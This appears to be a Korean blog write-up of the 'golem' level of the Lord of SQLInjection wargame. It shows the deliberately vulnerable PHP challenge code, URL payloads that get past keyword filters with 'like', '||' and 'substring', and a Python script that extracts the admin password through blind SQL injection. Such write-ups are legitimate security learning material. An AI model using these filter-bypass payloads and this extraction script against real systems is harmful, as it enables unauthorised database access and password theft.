IT보안관의 공부 클라우드

[los]golem 본문

워게임/los

[los]golem

ㅡㅡㅡㅡㄷ 2021. 6. 18. 19:39

query : select id from prob_golem where id='guest' and pw='' 

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
  highlight_file(__FILE__); 
?>



1.preg_match : prob _ . ( )
2.preg_match : or and substr( =

pw를 맞춰야함.

blind sql 인젝션

https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='a' || id like 'admin
like로 = 우회 가능

https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='a' || id like 'admin' %26%26 length(pw) like '8
패스워드 길이 찾기. 8자리

https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='a' || id like 'admin' %26%26 substring(pw,1,1) like '7
substr( 을 substring 으로 우회.

파이썬코드

#golemBlindSqlInjection

import requests
#from itertools import product

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*'
pw_list = list()
pw_str = str()
url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'
cookies = {'PHPSESSID':'7cu8mcoov0uo0qirli9sk9d38j'}
for i in range(1,9):
    pw=str()
    for j in range(1,9):
        param={'pw':"a' || 1 like 1 && id like 'admin' && substring(lpad(bin(ascii(substring(pw,"+str(i)+",1))),8,0),"+str(j)+",1) like '1"}
        res=requests.get(url,cookies=cookies,params=param,verify=False)
        res_text=res.text
        print(res_text)
        if "Hello admin" in res_text:
            pw=pw+'1'
        else:
            pw=pw+'0'
    pw_list.append(pw)
    print(pw_list)
for a in pw_list:
    b=int('0b'+a,2)
    pw_str= pw_str+chr(b)


print("PW:"+pw_str)
저작자표시 비영리

'워게임 > los' 카테고리의 다른 글

[los]giant  (0) 2021.06.30
[los]bugbear  (0) 2021.06.23
[los]darkkinght  (0) 2021.06.13
[los]skeleton  (0) 2021.06.08
[los]vampire  (0) 2021.06.01
'워게임/los' Related Articles more
Comments